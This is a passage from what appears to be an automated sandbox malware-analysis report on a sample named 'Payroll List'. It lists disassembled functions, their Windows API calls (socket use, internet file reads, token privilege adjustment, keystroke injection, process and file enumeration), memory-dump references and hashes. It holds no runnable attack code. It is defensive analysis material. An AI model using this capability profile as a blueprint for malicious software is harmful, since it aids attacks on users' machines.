                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 001665F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                    • String ID:
                                                                    • API String ID: 1605983538-0
                                                                    • Opcode ID: 815a29ba71151cf0f0580fcf9583b482ac1e4518a2e4186b0e029f1e4cc5a9f4
                                                                    • Instruction ID: e08dabfef96f090862f271b45606e41364687a5e90fe310b780046bef6454008
                                                                    • Opcode Fuzzy Hash: 815a29ba71151cf0f0580fcf9583b482ac1e4518a2e4186b0e029f1e4cc5a9f4
                                                                    • Instruction Fuzzy Hash: B521A7B1900218ABDB10ABA4DC89FEDB7BCAB09340F5000E5F506D3141DB719F85CF61
                                                                    Function 0017923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0017A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0017A84E
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00179296
                                                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 001792B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 4170576061-0
                                                                    • Opcode ID: 8ffc74c7cac690d7c419bc51a87b89f4b048c64622190969d8d24bf6ee35d96e
                                                                    • Instruction ID: 0fa78d5ea74c248f99b1999c60a44195481118c827634e39d5fa709337de5351
                                                                    • Opcode Fuzzy Hash: 8ffc74c7cac690d7c419bc51a87b89f4b048c64622190969d8d24bf6ee35d96e
                                                                    • Instruction Fuzzy Hash: CC41CD70600610AFDB14BB68DC82E7EB7EDEF58724F148448F95AAB3D2CB749D018B91
                                                                    Function 0016EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0016EB8A
                                                                    • _wcscmp.LIBCMT ref: 0016EBBA
                                                                    • _wcscmp.LIBCMT ref: 0016EBCF
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0016EBE0
                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0016EC0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 2387731787-0
                                                                    • Opcode ID: 2ca279213ae6346944c59bdb2227b283ae1fa18d76143356013e88aff448b34c
                                                                    • Instruction ID: cfbaca85fb8e1118a8560197b6346527f8093418230515e4cb9d5c92596e53d4
                                                                    • Opcode Fuzzy Hash: 2ca279213ae6346944c59bdb2227b283ae1fa18d76143356013e88aff448b34c
                                                                    • Instruction Fuzzy Hash: 9E41D135604701DFCB08DF28C891AA9B3E4FF59324F10465EE95A8B3A1DB31E955CF91
                                                                    Function 00188111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: d1c0422982a5e88e32331e72ffac7f2a85c9c7d5e2d00dd9aed681a6e54370b1
                                                                    • Instruction ID: 51bcdc2db0b48bbfbdc9e72fcd8b190a6ec3d051950ce20800dad8977d605cb4
                                                                    • Opcode Fuzzy Hash: d1c0422982a5e88e32331e72ffac7f2a85c9c7d5e2d00dd9aed681a6e54370b1
                                                                    • Instruction Fuzzy Hash: 5511BF317006106FE7217F26EC48A6FBB9DEF55760B450429F84AD7641CF30AA428BA0
                                                                    Function 00129B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                    • API String ID: 0-1546025612
                                                                    • Opcode ID: a385404dd4d59fb45d3ccf8a320a2199f82bf57fa11765c1e6d9d18f9758d95b
                                                                    • Instruction ID: d911128dc71e45cad5e902ba1c91ba5c88502a4636880c56262954ab194d69ec
                                                                    • Opcode Fuzzy Hash: a385404dd4d59fb45d3ccf8a320a2199f82bf57fa11765c1e6d9d18f9758d95b
                                                                    • Instruction Fuzzy Hash: 2F92DF75E0022ACBDF28CF58D8807BDB7B1BF55314F2581AAE816AB281D7309D91CF91
                                                                    Function 0013E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0013E014,75570AE0,0013DEF1,001BDC38,?,?), ref: 0013E02C
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0013E03E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 2574300362-192647395
                                                                    • Opcode ID: fb4c9925f231edd8b926fda010c5b62e4a63e282a25eb7ca0eeeedbef72e1daf
                                                                    • Instruction ID: 24a25fa1025a7b95329b782ed562a163222866b8a5c650d336bf1962f3dade27
                                                                    • Opcode Fuzzy Hash: fb4c9925f231edd8b926fda010c5b62e4a63e282a25eb7ca0eeeedbef72e1daf
                                                                    • Instruction Fuzzy Hash: 9CD0A730500B129FC7354F60FC0861277D4AF12300F18441AF492E2A90D7B4C8C08E50
                                                                    Function 001613CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001613DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: ($|
                                                                    • API String ID: 1659193697-1631851259
                                                                    • Opcode ID: 679468a716f3f4be76ad090a7df16f645c7193f007f8153ff91bd7b79cd2782c
                                                                    • Instruction ID: 0a47bc4bac0703cb43fb1da0ab77df666c8d0f323ad78576bc0c20a674635d78
                                                                    • Opcode Fuzzy Hash: 679468a716f3f4be76ad090a7df16f645c7193f007f8153ff91bd7b79cd2782c
                                                                    • Instruction Fuzzy Hash: 84320575A00705AFC728CF69C48096AB7F0FF48320B15C56EE59ADB3A1EB70E951CB44
                                                                    Function 0013B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 0013B22F
                                                                      • Part of subcall function 0013B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0013B5A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Proc$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 2749884682-0
                                                                    • Opcode ID: 666582b387920037ea1459222b6a18aa61ba077f5153b88e100ba1fe22b1ed51
                                                                    • Instruction ID: db332946dcfea1140d39d89a24923a655eb5bdd54d11d129e91134218872552c
                                                                    • Opcode Fuzzy Hash: 666582b387920037ea1459222b6a18aa61ba077f5153b88e100ba1fe22b1ed51
                                                                    • Instruction Fuzzy Hash: 41A1597051C005BAEF2CAF2A9CC8E7F29ACFB56740F15421DF606E6591FB29AD01D272
                                                                    Function 00174EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001743BF,00000000), ref: 00174FA6
                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00174FD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                    • String ID:
                                                                    • API String ID: 599397726-0
                                                                    • Opcode ID: 9078273d1b61dc097e6e45006d4e59ba1ab377f3bf99866d1f41e103ad079a10
                                                                    • Instruction ID: 42fd02b197c678540e35bcb8c857fd191ca9ed45a24819d030f76f9680e6418c
                                                                    • Opcode Fuzzy Hash: 9078273d1b61dc097e6e45006d4e59ba1ab377f3bf99866d1f41e103ad079a10
                                                                    • Instruction Fuzzy Hash: FF41EA71504609FFEB14DE94DC85EBF77BDEB40768F10802EF609A6141DBB19E4196A0
                                                                    Function 0016E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0016E20D
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0016E267
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0016E2B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1682464887-0
                                                                    • Opcode ID: 1ccd5d435dc618771d24a6e89f803f132a643a160fcbe3bc1a03e2b21a970426
                                                                    • Instruction ID: d803ff51649528bb77be1aab288c19423df9acbfd03465da57ccda8c7a213b64
                                                                    • Opcode Fuzzy Hash: 1ccd5d435dc618771d24a6e89f803f132a643a160fcbe3bc1a03e2b21a970426
                                                                    • Instruction Fuzzy Hash: D6216D35A00618EFCB00EFA5D884AADFBF8FF59310F0484AAE905E7251DB319955CB50
                                                                    Function 0015B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013F4EA: std::exception::exception.LIBCMT ref: 0013F51E
                                                                      • Part of subcall function 0013F4EA: __CxxThrowException@8.LIBCMT ref: 0013F533
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015B180
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015B1AD
                                                                    • GetLastError.KERNEL32 ref: 0015B1BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1922334811-0
                                                                    • Opcode ID: c9ae20a3709ab5082f7c76a06622cd3e3e4bc6bc1e488de22bc17becbd1f9370
                                                                    • Instruction ID: 958c6d45413ac802cf60468e69fb5181cf525681c64402f4c61dc1c7b394ec8a
                                                                    • Opcode Fuzzy Hash: c9ae20a3709ab5082f7c76a06622cd3e3e4bc6bc1e488de22bc17becbd1f9370
                                                                    • Instruction Fuzzy Hash: F411BFB1804604AFE7189F64ECC5D2BB7BCFB44311B20852EF45A97640DB70FC458B60
                                                                    Function 00166606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00166623
                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00166664
                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0016666F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                    • String ID:
                                                                    • API String ID: 33631002-0
                                                                    • Opcode ID: f146e51ed45168273834553173c61c5df57567e81d8e25fd15c866ea18fd2316
                                                                    • Instruction ID: 7f2fdc609dabe1bb3833836c4b8a04dd8711c8545ba6589c352d2d845a94dd16
                                                                    • Opcode Fuzzy Hash: f146e51ed45168273834553173c61c5df57567e81d8e25fd15c866ea18fd2316
                                                                    • Instruction Fuzzy Hash: A6111EB1E01228BFDB108FA5EC45BAEBBBCEB45B10F104156F901F6290D7B05E059BA5
                                                                    Function 001671FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00167223
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0016723A
                                                                    • FreeSid.ADVAPI32(?), ref: 0016724A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: c5eb41dc97a171e772c9bef4494589869d2a6a9733c03636bffe53b3bea3d2a6
                                                                    • Instruction ID: 7e30491ebbf09797f8ba665b9ed5193a6ae2744387d699d2fdf764a99abd1dae
                                                                    • Opcode Fuzzy Hash: c5eb41dc97a171e772c9bef4494589869d2a6a9733c03636bffe53b3bea3d2a6
                                                                    • Instruction Fuzzy Hash: C2F01776A04209BFDF04DFF4DD99AEEBBB8FF09205F104869B602E2591E3709A448B10
                                                                    Function 0016F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0016F599
                                                                    • FindClose.KERNEL32(00000000), ref: 0016F5C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: c734de02e9da6896efd040c25d3e07d94c12ee4f524315750452560cacbe90b0
                                                                    • Instruction ID: 665256c5a4c50032e396a99b7e925927b2630612d9609e848f857c97d01aa271
                                                                    • Opcode Fuzzy Hash: c734de02e9da6896efd040c25d3e07d94c12ee4f524315750452560cacbe90b0
                                                                    • Instruction Fuzzy Hash: AD1188716046009FD710EF28D845A2EF7E5FF95324F00855EF8AAD7291DB30AD158B85
                                                                    Function 0016CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0017BE6A,?,?,00000000,?), ref: 0016CEA7
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0017BE6A,?,?,00000000,?), ref: 0016CEB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 084dcb4edf3c3fa8818731916a843a2200cc76aaf423b8c69730e777af2b28cb
                                                                    • Instruction ID: 8d13cbf218f610feac1beab72323c31df30b1ef12d936d4d0e80c05e24e9e9d5
                                                                    • Opcode Fuzzy Hash: 084dcb4edf3c3fa8818731916a843a2200cc76aaf423b8c69730e777af2b28cb
                                                                    • Instruction Fuzzy Hash: 6BF08271500229ABDB109BA4DC49FFA777DBF09351F004165F915D6191D7709A54CBA0
                                                                    Function 0016411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00164153
                                                                    • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00164166
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InputSendkeybd_event
                                                                    • String ID:
                                                                    • API String ID: 3536248340-0
                                                                    • Opcode ID: 66494680988c2787e42a18d971e7c75cf8631bb7bfdc40b24cfa319d2c2fdac1
                                                                    • Instruction ID: bfeece4457f11ab89ff7dbfa08af56cfbea11e0b849cf33128c61be02b8ad3e2
                                                                    • Opcode Fuzzy Hash: 66494680988c2787e42a18d971e7c75cf8631bb7bfdc40b24cfa319d2c2fdac1
                                                                    • Instruction Fuzzy Hash: 1DF0677080024DAFDB058FA0CC05BBE7BB0EF01305F04800AF966A6192D77996569FA0
                                                                    Function 0015AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0015ACC0), ref: 0015AB99
                                                                    • CloseHandle.KERNEL32(?,?,0015ACC0), ref: 0015ABAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
